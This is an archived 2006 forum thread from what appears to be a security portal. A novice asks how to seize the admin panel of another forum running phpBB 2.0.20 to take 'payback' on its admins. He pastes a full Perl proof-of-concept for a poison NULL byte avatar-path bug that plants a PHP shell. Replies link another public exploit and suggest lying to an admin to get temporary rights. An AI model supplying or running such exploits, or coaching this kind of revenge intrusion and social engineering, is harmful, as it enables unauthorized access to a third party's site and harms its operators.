Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 55
Members: 0
Total: 55
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> This forum has really pushed my buttons! Payback time
Post new topicReply to topic View previous topic :: View next topic
This forum has really pushed my buttons! Payback time
PostPosted: Sat Dec 02, 2006 11:06 am Reply with quote
lordtopcat
Regular user
Regular user
Joined: Dec 02, 2006
Posts: 8




Hi,

I am new to hacking (not hacked a single thing yet)

However -

This one forum has really pushed my buttons and all the forum admins are all asses. And It's time one of the users took action. Well, demoting them ofcourse! Muhahaha

However, I need to know how to gain access to the Admin panel. I have activestate installed.

As far as I know, the forum is running on phpbb 2.0.20. From reading the docs/CHANGELOG.html.

If anyone could help me, I would really appreciate it!

It's time these Admin's get what's coming to them.

Thanks,
View user's profile Send private message
PostPosted: Sat Dec 02, 2006 1:41 pm Reply with quote
Sm0ke
Moderator
Moderator
Joined: Nov 25, 2006
Posts: 141
Location: Finland




there is only one puplic exploit for it

http://securitydot.net/xpl/exploits/vulnerabilities/articles/910/exploit.html

but you need admin sid to use it
View user's profile Send private message
PostPosted: Sat Dec 02, 2006 7:22 pm Reply with quote
lordtopcat
Regular user
Regular user
Joined: Dec 02, 2006
Posts: 8




How can I get an sid?

And I found this code for 2.0.21. Will it work with 2.0.20?

Code:

#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian):
http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was
described
# in [1]. ShAnKaR noted, that same vulnerability also affects
different
# PHP applications. An example of vulnerable applications are phpBB
and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files
on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to
filename.
#
# In case of phpBB and punBB vulnerability can be exploited by
changing
# location of avatar file and uploading avatar file with PHP code in
EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass
images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible;
Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}


I am also a bit confused as to what I change to configure it to the right forum.
View user's profile Send private message
PostPosted: Sat Dec 02, 2006 8:23 pm Reply with quote
Chb
Valuable expert
Valuable expert
Joined: Jul 23, 2005
Posts: 206
Location: Germany




I overflew the code and you seem to need a valid administrator account to use it, as you can read in the usage.
Beside that, imho in most cases exploits for newer versions also work in older versions. Depending of the changed sourcecode of updates.

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Sun Dec 03, 2006 7:56 am Reply with quote
Sm0ke
Moderator
Moderator
Joined: Nov 25, 2006
Posts: 141
Location: Finland




try to contact admin make some good storie to tell him so he would give you temporary admin Smile
View user's profile Send private message
PostPosted: Sun Dec 03, 2006 7:09 pm Reply with quote
lordtopcat
Regular user
Regular user
Joined: Dec 02, 2006
Posts: 8




player123 wrote:
try to contact admin make some good storie to tell him so he would give you temporary admin Smile


lmao....all the admins there hate me! lol

Are there any other scripts out there?
View user's profile Send private message
This forum has really pushed my buttons! Payback time
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.044 Seconds